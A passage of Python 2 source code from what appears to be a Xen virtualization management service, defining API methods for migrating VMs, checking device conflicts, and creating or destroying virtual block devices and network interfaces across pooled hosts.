if path:
cmd = 'rm -f %s' % path
doexec(cmd)
def VM_copy_sxp_to_nfs(self, session, vm_ref, path):
'''
@author: wuyuewen
@summary: Internal method. Copy sxp to HA dir.
'''
XendDomain.instance().copy_sxp_to_ha(vm_ref, path)
return xen_api_success_void()
def VM_suspend(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_suspend(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_suspend', vm_ref)
else:
return self._VM_suspend(session, vm_ref)
def _VM_suspend(self, session, vm_ref):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_suspend", vm_ref)
def VM_unpause(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_unpause(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_unpause', vm_ref)
else:
return self._VM_unpause(session, vm_ref)
def _VM_unpause(self, session, vm_ref):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_unpause", vm_ref)
def VM_send_sysrq(self, _, vm_ref, req):
'''
@deprecated: not used
'''
xeninfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
if xeninfo.state == XEN_API_VM_POWER_STATE_RUNNING \
or xeninfo.state == XEN_API_VM_POWER_STATE_PAUSED:
xeninfo.send_sysrq(req)
return xen_api_success_void()
else:
return xen_api_error(
['VM_BAD_POWER_STATE', vm_ref,
XendDomain.POWER_STATE_NAMES[XEN_API_VM_POWER_STATE_RUNNING],
XendDomain.POWER_STATE_NAMES[xeninfo.state]])
def VM_send_trigger(self, _, vm_ref, trigger, vcpu):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
xendom.domain_send_trigger(xeninfo.getDomid(), trigger, vcpu)
return xen_api_success_void()
def VM_migrate(self, session, vm_ref, destination_url, live, other_config):
'''
@deprecated: not used
'''
return self._VM_migrate(session, vm_ref, destination_url, live, other_config)
def _VM_migrate(self, session, vm_ref, destination_url, live, other_config):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_pool_migrate
'''
self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
port = other_config.get("port", 0)
node = other_config.get("node", -1)
ssl = other_config.get("ssl", None)
chs = other_config.get("change_home_server", False)
xendom.domain_migrate(xeninfo.getDomid(), destination_url,
bool(live), port, node, ssl, bool(chs))
#log.debug('migrate')
# set all tag
#self.VM_set_all_tag(session, vm_ref)
return xen_api_success_void()
def VM_pool_migrate(self, session, vm_ref, dst_host_ref, other_config):
'''
@author: wuyuewen
@summary: Migrate specified VM to specified Host. IO limit setting must read
before migrate and set back after migrate.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param dst_host_ref: destination Host's uuid
@param other_config: useless
@return: True | False
@rtype: dict.
'''
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
dst_host_ip = BNPoolAPI.get_host_ip(dst_host_ref)
tag_list = self.VM_get_all_tag(session, vm_ref, 'tag').get('Value')
rate_list = self.VM_get_all_tag(session, vm_ref, 'rate').get('Value')
burst_list = self.VM_get_all_tag(session, vm_ref, 'burst').get('Value')
io_limit_list = {}
for type in ['read', 'write']:
for io_unit in ['MBps', 'iops']:
key = "%s_%s" % (type, io_unit)
io_limit_list[key] = self.VM_get_IO_rate_limit(session, vm_ref, type, io_unit).get('Value')
if cmp(host_ref, XendNode.instance().uuid) == 0:
self._VM_migrate(session, vm_ref, dst_host_ip, True, other_config)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
xen_rpc_call(host_ip, "VM_migrate", vm_ref, dst_host_ip, True, other_config)
log.debug("Migrate VM from host: %s" % host_ip)
log.debug("Migrate VM to host: %s" % dst_host_ip)
BNPoolAPI.update_data_struct("vm_migrate", vm_ref, host_ref, dst_host_ref)
self.VM_set_all_tag(session, vm_ref, tag_list)
self.VM_set_all_rate(session, vm_ref, 'rate', rate_list)
self.VM_set_all_rate(session, vm_ref, 'burst', burst_list)
self.VM_start_set_IO_limit(session, vm_ref, io_limit_list)
return xen_api_success_void()
def VM_save(self, _, vm_ref, dest, checkpoint):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
xendom.domain_save(xeninfo.getDomid(), dest, checkpoint)
return xen_api_success_void()
def VM_restore(self, _, src, paused):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xendom.domain_restore(src, bool(paused))
return xen_api_success_void()
def VM_check_usb_scsi_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check usb scsi validity.
'''
return self._VM_check_usb_scsi_valid(session, vm_ref)
def _VM_check_usb_scsi_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check usb scsi validity.
'''
log.debug('VM_check_fibers_valid')
crush_vm = None
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
#get local fiber uuid of the to_started vm
loc_fiber_unames = []
loc_fiber_uuids= self._VM_get_usb_scsi(session, vm_ref).get('Value')
# get local fiber uname of the to_started vm
for loc_fiber_uuid in loc_fiber_uuids:
dev_type, dev_config = dominfo.info['devices'].get(loc_fiber_uuid, (None, None))
if dev_config:
loc_fiber_uname = dev_config.get('uname')
if loc_fiber_uname:
loc_fiber_unames.append(loc_fiber_uname)
if loc_fiber_unames:
running_vms = xd.get_running_vms()
for vm in running_vms:
#if vm.info.get('domid') == dominfo.info.get('domid'):
#log.debug('check dom itself %s' % vm.info.get('domid'))
#continue
device_struct = vm.info['devices']
for uuid, config in device_struct.items():
if config[1].get('uname') in loc_fiber_unames:
vm_name = vm.info['name_label']
crush_vm = vm_name
return xen_api_success(crush_vm)
return xen_api_success(crush_vm)
def VM_check_fibers_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check fibers validity.
'''
return self._VM_check_fibers_valid(session, vm_ref)
#add by wufan
def _VM_check_fibers_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check fibers validity.
'''
log.debug('VM_check_fibers_valid')
crush_vm = None
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
#get local fiber uuid of the to_started vm
loc_fiber_unames = []
loc_fiber_uuids= self._VM_get_fibers(session, vm_ref).get('Value')
# get local fiber uname of the to_started vm
for loc_fiber_uuid in loc_fiber_uuids:
dev_type, dev_config = dominfo.info['devices'].get(loc_fiber_uuid, (None, None))
if dev_config:
loc_fiber_uname = dev_config.get('uname')
if loc_fiber_uname:
loc_fiber_unames.append(loc_fiber_uname)
if loc_fiber_unames:
running_vms = xd.get_running_vms()
for vm in running_vms:
#if vm.info.get('domid') == dominfo.info.get('domid'):
#log.debug('check dom itself %s' % vm.info.get('domid'))
#continue
device_struct = vm.info['devices']
for uuid, config in device_struct.items():
if config[1].get('uname') in loc_fiber_unames:
vm_name = vm.info['name_label']
crush_vm = vm_name
return xen_api_success(crush_vm)
return xen_api_success(crush_vm)
def VM_cpu_pool_migrate(self, session, vm_ref, cpu_pool_ref):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
domid = xeninfo.getDomid()
pool = XendAPIStore.get(cpu_pool_ref, XendCPUPool.getClass())
if pool == None:
return xen_api_error(['HANDLE_INVALID', 'cpu_pool', cpu_pool_ref])
if domid is not None:
if domid == 0:
return xen_api_error(['OPERATION_NOT_ALLOWED',
'could not move Domain-0'])
try:
XendCPUPool.move_domain(cpu_pool_ref, domid)
except Exception, ex:
return xen_api_error(['INTERNAL_ERROR',
'could not move domain'])
self.VM_set('pool_name', session, vm_ref, pool.get_name_label())
return xen_api_success_void()
def VM_create_data_VBD(self, session, vm_ref, vdi_ref, read_only=False):
'''
@author: wuyuewen
@summary: VM create data VBD and VDI.
@precondition: At most 8 data VBD.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vdi_ref: new VDI's uuid
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_create_data_VBD(session, vm_ref, vdi_ref, read_only)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_create_data_VBD', vm_ref, vdi_ref, read_only)
else:
return self._VM_create_data_VBD(session, vm_ref, vdi_ref, read_only)
def _VM_create_data_VBD(self, session, vm_ref, vdi_ref, read_only):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_create_data_VBD
'''
log.debug("=====VM_create_data_VBD=====")
if not read_only:
vbd_struct = {'VM' : vm_ref,
'VDI' : vdi_ref,
'bootable' : False,
# 'device' : self._VM_get_available_vbd_device(session, vm_ref, 'xvd').get('Value', ''),
'mode' : 'RW',
'type' : 'Disk',
}
else:
vbd_struct = {'VM' : vm_ref,
'VDI' : vdi_ref,
'bootable' : False,
# 'device' : self._VM_get_available_vbd_device(session, vm_ref, 'xvd').get('Value', ''),
'mode' : 'R',
'type' : 'Disk',
}
response = self._VBD_create(session, vbd_struct)
if cmp(response.get('Status'), 'Success') == 0:
return xen_api_success(True)
else:
return xen_api_success(False)
def VM_delete_data_VBD(self, session, vm_ref, vdi_ref):
'''
@author: wuyuewen
@summary: VM delete data VBD and VDI.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vdi_ref: new VDI's uuid
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_delete_data_VBD(session, vm_ref, vdi_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_delete_data_VBD', vm_ref, vdi_ref)
else:
return self._VM_delete_data_VBD(session, vm_ref, vdi_ref)
def _VM_delete_data_VBD(self, session, vm_ref, vdi_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_delete_data_VBD
'''
self.__vbd_lock__.acquire()
try:
log.debug("=====VM_delete_data_VBD=====")
log.debug('VDI ref: %s' % vdi_ref)
vdi = XendNode.instance().get_vdi_by_uuid(vdi_ref)
vbd = []
vbd_ref = ""
if vdi:
log.debug('get VBDs by VDI:')
vbd = vdi.getVBDs()
log.debug(vbd)
else:
return xen_api_success(False)
if vbd and isinstance(vbd, list):
vbd_ref = vbd[0]
else:
return xen_api_success(False)
log.debug("vbd ref: %s" % vbd_ref)
response = self.VBD_destroy(session, vbd_ref)
if cmp(response.get('Status'), 'Success') == 0:
return xen_api_success(True)
else:
return xen_api_success(False)
except Exception, exn:
log.exception(exn)
return xen_api_success(False)
finally:
self.__vbd_lock__.release()
# Xen API: Class VBD
# ----------------------------------------------------------------
VBD_attr_ro = ['VM',
'VDI',
'metrics',
'runtime_properties',
'io_read_kbs',
'io_write_kbs']
VBD_attr_rw = ['device',
'bootable',
'mode',
'type']
VBD_attr_inst = VBD_attr_rw
VBD_methods = [('media_change', None), ('destroy', None), ('destroy_on', None)]
VBD_funcs = [('create', 'VBD'),
('create_on', 'VBD')]
# object methods
def VBD_get_record(self, session, vbd_ref):
storage = self._get_BNStorageAPI_instance()
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
cfg = vm.get_dev_xenapi_config('vbd', vbd_ref)
if not cfg:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
valid_vbd_keys = self.VBD_attr_ro + self.VBD_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
return_cfg = {}
for k in cfg.keys():
if k in valid_vbd_keys:
return_cfg[k] = cfg[k]
return_cfg['metrics'] = vbd_ref
return_cfg['runtime_properties'] = {} #todo
return_cfg['io_read_kbs'] = vm.get_dev_property('vbd', vbd_ref, 'io_read_kbs')
return_cfg['io_write_kbs'] = vm.get_dev_property('vbd', vbd_ref, 'io_write_kbs')
if return_cfg.has_key('VDI') and return_cfg.get('VDI'):
location = storage.VDI_get_location(session, return_cfg.get('VDI')).get('Value')
if location:
return_cfg['userdevice'] = location
# log.debug(return_cfg)
return xen_api_success(return_cfg)
def VBD_media_change(self, session, vbd_ref, new_vdi_ref):
xendom = XendDomain.instance()
xennode = XendNode.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
cur_vbd_struct = vm.get_dev_xenapi_config('vbd', vbd_ref)
if not cur_vbd_struct:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['type'] != XEN_API_VBD_TYPE[0]: # Not CD
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['mode'] != 'RO': # Not read only
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
new_vdi = xennode.get_vdi_by_uuid(new_vdi_ref)
if not new_vdi:
return xen_api_error(['HANDLE_INVALID', 'VDI', new_vdi_ref])
new_vdi_image = new_vdi.get_location()
valid_vbd_keys = self.VBD_attr_ro + self.VBD_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
new_vbd_struct = {}
for k in cur_vbd_struct.keys():
if k in valid_vbd_keys:
new_vbd_struct[k] = cur_vbd_struct[k]
new_vbd_struct['VDI'] = new_vdi_ref
try:
XendTask.log_progress(0, 100,
vm.change_vdi_of_vbd,
new_vbd_struct, new_vdi_image)
except XendError, e:
log.exception("Error in VBD_media_change")
return xen_api_error(['INTERNAL_ERROR', str(e)])
return xen_api_success_void()
# class methods
def VBD_create_on(self, session, vbd_struct, host_ref):
storage = self._get_BNStorageAPI_instance()
# log.debug(vbd_struct)
if BNPoolAPI._isMaster:
vbd_type = vbd_struct.get('type')
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VBD_create(session, vbd_struct)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
if cmp(vbd_type, XEN_API_VBD_TYPE[0]) == 0:
vdi = vbd_struct.get('VDI')
if vdi:
log.debug(storage.VDI_get_name_label(session, vdi))
vdi_name = storage.VDI_get_name_label(session, vdi).get('Value')
if vdi_name:
remote_vdi = xen_rpc_call(remote_ip, 'VDI_get_by_name_label', vdi_name).get('Value')
if remote_vdi:
vbd_struct['VDI'] = remote_vdi
else:
return xen_api_error(['%s VDI %s not find!' % (remote_ip, vdi_name)])
else:
return xen_api_error(['Invaild VDI %s' % vdi])
else:
return xen_api_error(['vbd struct error, VDI not define.'])
return xen_rpc_call(remote_ip, 'VBD_create', vbd_struct)
else:
return self.VBD_create(session, vbd_struct)
def VBD_create(self, session, vbd_struct):
vm_ref = vbd_struct.get('VM')
if not vm_ref:
return xen_api_error(['VM_NOT_FOUND'])
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VBD_create(session, vbd_struct)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VBD_create', vbd_struct)
else:
return self._VBD_create(session, vbd_struct)
def _VBD_create(self, session, vbd_struct):
xendom = XendDomain.instance()
xennode = XendNode.instance()
if not xendom.is_valid_vm(vbd_struct['VM']):
return xen_api_error(['VM_NOT_FOUND', 'VM', vbd_struct['VM']])
dom = xendom.get_vm_by_uuid(vbd_struct['VM'])
vdi = xennode.get_vdi_by_uuid(vbd_struct['VDI'])
if not vdi:
return xen_api_error(['HANDLE_INVALID', 'VDI', vbd_struct['VDI']])
# new VBD via VDI/SR
vdi_image = vdi.get_location()
log.debug("vdi location: %s" % vdi_image)
try:
vbd_ref = XendTask.log_progress(0, 100,
dom.create_vbd_for_xenapi,
vbd_struct, vdi_image)
log.debug('VBD_create %s' % vbd_ref)
except XendError, e:
log.exception("Error in VBD_create")
return xen_api_error(['INTERNAL_ERROR', str(e)])
xendom.managed_config_save(dom)
return xen_api_success(vbd_ref)
def VBD_destroy(self, session, vbd_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
# vdi_ref = XendDomain.instance()\
# .get_dev_property_by_uuid('vbd', vbd_ref, "VDI")
# vdi = XendNode.instance().get_vdi_by_uuid(vdi_ref)
XendTask.log_progress(0, 100, vm.destroy_vbd, vbd_ref)
xendom.managed_config_save(vm)
return xen_api_success_void()
def VBD_destroy_on(self, session, vbd_ref, host_ref):
if BNPoolAPI._isMaster:
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VBD_destroy(session, vbd_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, "VBD_destroy", vbd_ref)
else:
return self.VBD_destroy(session, vbd_ref)
def _VBD_get(self, vbd_ref, prop):
return xen_api_success(
XendDomain.instance().get_dev_property_by_uuid(
'vbd', vbd_ref, prop))
# attributes (ro)
def VBD_get_metrics(self, _, vbd_ref):
return xen_api_success(vbd_ref)
def VBD_get_runtime_properties(self, _, vbd_ref):
xendom = XendDomain.instance()
dominfo = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
device = dominfo.get_dev_config_by_uuid('vbd', vbd_ref)
try:
devid = int(device['id'])
device_sxps = dominfo.getDeviceSxprs('vbd')
device_dicts = [dict(device_sxp[1][0:]) for device_sxp in device_sxps]
device_dict = [device_dict
for device_dict in device_dicts
if int(device_dict['virtual-device']) == devid][0]
return xen_api_success(device_dict)
except Exception, exn:
log.exception(exn)
return xen_api_success({})
# attributes (rw)
def VBD_get_VM(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'VM')
def VBD_get_VDI(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'VDI')
def VBD_get_device(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'device')
def VBD_get_bootable(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'bootable')
def VBD_get_mode(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'mode')
def VBD_get_type(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'type')
def VBD_set_bootable(self, session, vbd_ref, bootable):
bootable = bool(bootable)
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('vbd', vbd_ref)
vm.set_dev_property('vbd', vbd_ref, 'bootable', int(bootable))
xd.managed_config_save(vm)
return xen_api_success_void()
def VBD_set_mode(self, session, vbd_ref, mode):
if mode == 'RW':
mode = 'w'
else:
mode = 'r'
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('vbd', vbd_ref)
vm.set_dev_property('vbd', vbd_ref, 'mode', mode)
xd.managed_config_save(vm)
return xen_api_success_void()
def VBD_set_VDI(self, session, vbd_ref, VDI):
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('vbd', vbd_ref)
vm.set_dev_property('vbd', vbd_ref, 'VDI', VDI)
xd.managed_config_save(vm)
return xen_api_success_void()
def VBD_get_all(self, session):
xendom = XendDomain.instance()
vbds = [d.get_vbds() for d in XendDomain.instance().list('all')]
vbds = reduce(lambda x, y: x + y, vbds)
return xen_api_success(vbds)
# Xen API: Class VBD_metrics
# ----------------------------------------------------------------
VBD_metrics_attr_ro = ['io_read_kbs',
'io_write_kbs',
'last_updated']
VBD_metrics_attr_rw = []
VBD_metrics_methods = []
def VBD_metrics_get_all(self, session):
return self.VBD_get_all(session)
def VBD_metrics_get_record(self, _, ref):
vm = XendDomain.instance().get_vm_with_dev_uuid('vbd', ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD_metrics', ref])
return xen_api_success(
{ 'io_read_kbs' : vm.get_dev_property('vbd', ref, 'io_read_kbs'),
'io_write_kbs' : vm.get_dev_property('vbd', ref, 'io_write_kbs'),
'last_updated' : now()
})
def VBD_metrics_get_io_read_kbs(self, _, ref):
return self._VBD_get(ref, 'io_read_kbs')
def VBD_metrics_get_io_write_kbs(self, session, ref):
return self._VBD_get(ref, 'io_write_kbs')
def VBD_metrics_get_last_updated(self, _1, _2):
return xen_api_success(now())
# Xen API: Class VIF
# ----------------------------------------------------------------
VIF_attr_ro = ['network',
'VM',
'metrics',
'runtime_properties']
VIF_attr_rw = ['device',
'MAC',
'MTU',
'security_label',
'physical_network',
'physical_network_local',
]
VIF_attr_inst = VIF_attr_rw
VIF_methods = [('destroy', None)]
VIF_funcs = [('create', 'VIF'),
('create_on', 'VIF'),
('create_bind_to_physical_network', None)
]
# object methods
def VIF_get_record(self, session, vif_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
cfg = vm.get_dev_xenapi_config('vif', vif_ref)
if not cfg:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
valid_vif_keys = self.VIF_attr_ro + self.VIF_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
return_cfg = {}
for k in cfg.keys():
if k in valid_vif_keys:
return_cfg[k] = cfg[k]
return_cfg['metrics'] = vif_ref
return xen_api_success(return_cfg)
# class methods
def VIF_create_on(self, session, vif_struct, host_ref):
if BNPoolAPI._isMaster:
network = vif_struct.get('network')
log.debug("get network from rec: %s", network)
#if network:
# log.debug(xenapi.network_get_name_label(session, network))
# network_label = xenapi.network_get_name_label(session, network).get('Value')
# # log.debug(network_label)
#else:
# vif_struct['network'] = 'ovs0'
# log.debug("get from network : %s" % vif_struct.get('network'))
# #return xen_api_error(['network not found'])
if not network or cmp(network, 'OpaqueRef:NULL') == 0:
vif_struct['network'] = 'ovs1'
log.debug("get from network : %s" % vif_struct.get('network'))
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VIF_create(session, vif_struct)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
#remote_network = xen_rpc_call(remote_ip, 'network_get_by_name_label', network_label).get('Value')
#if remote_network:
# log.debug(remote_network[0])
# vif_struct['network'] = remote_network[0]
#else:
# return xen_api_error(['%s network not found!' % remote_ip, 'Network'])
return xen_rpc_call(remote_ip, 'VIF_create', vif_struct)
else:
network = vif_struct.get('network')
log.debug("get network from rec: %s", network)
if not network or cmp(network, 'OpaqueRef:NULL') == 0:
vif_struct['network'] = 'ovs1'
log.debug("get from network : %s" % vif_struct.get('network'))
return self.VIF_create(session, vif_struct)
def VIF_create_bind_to_physical_network(self, session, vif_struct, phy_network):
if BNPoolAPI._isMaster:
vm_ref = vif_struct.get('VM', '')
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VIF_create_bind_to_physical_network(session, vif_struct, phy_network)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VIF_create_bind_to_physical_network', vif_struct, phy_network)
else:
return self._VIF_create_bind_to_physical_network(session, vif_struct, phy_network)
def _VIF_create_bind_to_physical_network(self, session, vif_struct, phy_network):
vm_ref = vif_struct.get('VM', '')
vifs = self._VM_get_VIFs(session, vm_ref).get('Value')
if vifs:
if cmp(len(vifs), INTERFACE_LIMIT) >= 0:
return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VIF'])
xenapi = self._get_XendAPI_instance()
log.debug('VIF create bind to physical network')
network_refs = xenapi.network_get_all(session).get('Value')
network_names = []
for ref in network_refs:
namelabel = xenapi.network_get_name_label(session, ref).get('Value')
network_names.append(namelabel)
# log.debug(network_names)
if phy_network not in network_names:
return xen_api_error(['Network name do not exist!'] + network_names)
vif_struct['network'] = phy_network
log.debug("get from network : %s" % vif_struct.get('network'))
return self._VIF_create(session, vif_struct)
'''
set physical network for vm, pass the refer
'''
def VIF_set_physical_network(self, session, vif_ref, vm_ref, phy_network):
log.debug('VIF(%s)_set_physical_network on vm(%s)' % (vif_ref, vm_ref))
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VIF_set_physical_network_local(session, vif_ref, vm_ref, phy_network)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VIF_set_physical_network', vif_ref, vm_ref, phy_network)
else:
return self.VIF_set_physical_network_local(session, vif_ref, vm_ref, phy_network)
def VIF_set_physical_network_local(self, session, vif_ref, vm_ref, phy_network):
xenapi = self._get_XendAPI_instance()
log.debug('local method VIF(%s)_set_physical_network on vm(%s)' % (vif_ref, vm_ref))
network_refs = xenapi.network_get_all(session).get('Value')
network_names = {}
for ref in network_refs:
namelabel = xenapi.network_get_name_label(session, ref).get('Value')
network_names[namelabel] = ref
log.debug(network_names)
if phy_network not in network_names:
return xen_api_error(['Network name do not exist!'] + network_names)
xendom = XendDomain.instance()
dom = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not dom:
log.debug('vif cannot be found on vm!')
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
# if dom._stateGet() == XEN_API_VM_POWER_STATE_RUNNING:
# log.debug('VM(%s) is running!' % vm_ref)
# return xen_api_error(['VM is running!'])
try:
origin_network = self.VIF_get_network(session, vif_ref).get('Value')
except:
log.exception("VIF did not have Network field.")
origin_network = None
new_network = network_names[phy_network]
origin_bridge = self._VIF_get(vif_ref, 'bridge').get('Value')
# origin_bridge = xenapi.network_get_name_label(session, origin_network).get('Value')
new_bridge = phy_network
# log.debug('origin_network: %s and new_network: %s' % (origin_network, new_network))
# log.debug('origin_bridge: %s and new_bridge: %s' % (origin_bridge, new_bridge))
#must set both network and bridge, or set bridge only,
#do not set network only, set network only won't work
rc = True
rc1 = True
if origin_network and cmp(origin_network, new_network) != 0 :
rc = self._VIF_set(vif_ref, 'network', new_network, origin_network)
if cmp(origin_bridge, new_bridge) != 0:
rc1 = self._VIF_set(vif_ref, 'bridge', new_bridge, origin_bridge)
if rc == False or rc1 == False:
log.error('set vif physical network failed')
return xen_api_error(['set vif physical network failed'])
return xen_api_success_void()
def VIF_create(self, session, vif_struct):
vm_ref = vif_struct.get('VM')
if not vm_ref:
return xen_api_error(['VM_NOT_FOUND'])
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VIF_create(session, vif_struct)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VIF_create', vif_struct)
else:
return self._VIF_create(session, vif_struct)
def _VIF_create(self, session, vif_struct):
xendom = XendDomain.instance()
mac = vif_struct.get('MAC')
vm_ref = vif_struct.get('VM')
if not xendom.is_valid_vm(vm_ref):
return xen_api_error(['VM_NOT_FOUND', 'VM', vif_struct.get('VM')])
vifs = self._VM_get_VIFs(session, vm_ref).get('Value')
if vifs:
if cmp(len(vifs), INTERFACE_LIMIT) >= 0:
return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VIF'])
if not self._VIF_is_mac_format_legal(mac):
return xen_api_error(['MAC_INVALID'])
dom = xendom.get_vm_by_uuid(vif_struct.get('VM'))
try:
vif_ref = dom.create_vif(vif_struct)
xendom.managed_config_save(dom)
return xen_api_success(vif_ref)
except XendError, exn:
return xen_api_error(['INTERNAL_ERROR', str(exn)])
def _VIF_is_mac_format_legal(self, mac):
mac_re = re.compile("00:16:3e:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]")
if not mac:
return True
if mac and cmp(mac_re.match(mac), None) != 0:
return True
return False
def VIF_destroy(self, session, vif_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
vm.destroy_vif(vif_ref)
xendom.managed_config_save(vm)
return xen_api_success_void()
def _VIF_get(self, ref, prop):
return xen_api_success(
XendDomain.instance().get_dev_property_by_uuid('vif', ref, prop))
# getters/setters
def VIF_get_metrics(self, _, vif_ref):
return xen_api_success(vif_ref)
def VIF_get_VM(self, session, vif_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vif', vif_ref)
return xen_api_success(vm.get_uuid())
def VIF_get_MTU(self, session, vif_ref):
return self._VIF_get(vif_ref, 'MTU')
def VIF_get_MAC(self, session, vif_ref):
return self._VIF_get(vif_ref, 'MAC')
def VIF_get_device(self, session, vif_ref):
return self._VIF_get(vif_ref, 'device')
def VIF_get_network(self, session, vif_ref):
return self._VIF_get(vif_ref, 'network')
def VIF_get_all(self, session):
xendom = XendDomain.instance()
vifs = [d.get_vifs() for d in XendDomain.instance().list('all')]
vifs = reduce(lambda x, y: x + y, vifs)
return xen_api_success(vifs)
def VIF_get_runtime_properties(self, _, vif_ref):
xendom = XendDomain.instance()
dominfo = xendom.get_vm_with_dev_uuid('vif', vif_ref)
device = dominfo.get_dev_config_by_uuid('vif', vif_ref)
try:
devid = int(device['id'])
device_sxps = dominfo.getDeviceSxprs('vif')
device_dicts = [dict(device_sxp[1][1:])
for device_sxp in device_sxps]
device_dict = [device_dict
for device_dict in device_dicts
if int(device_dict['handle']) == devid][0]
return xen_api_success(device_dict)
except Exception, exn:
log.exception(exn)
return xen_api_success({})
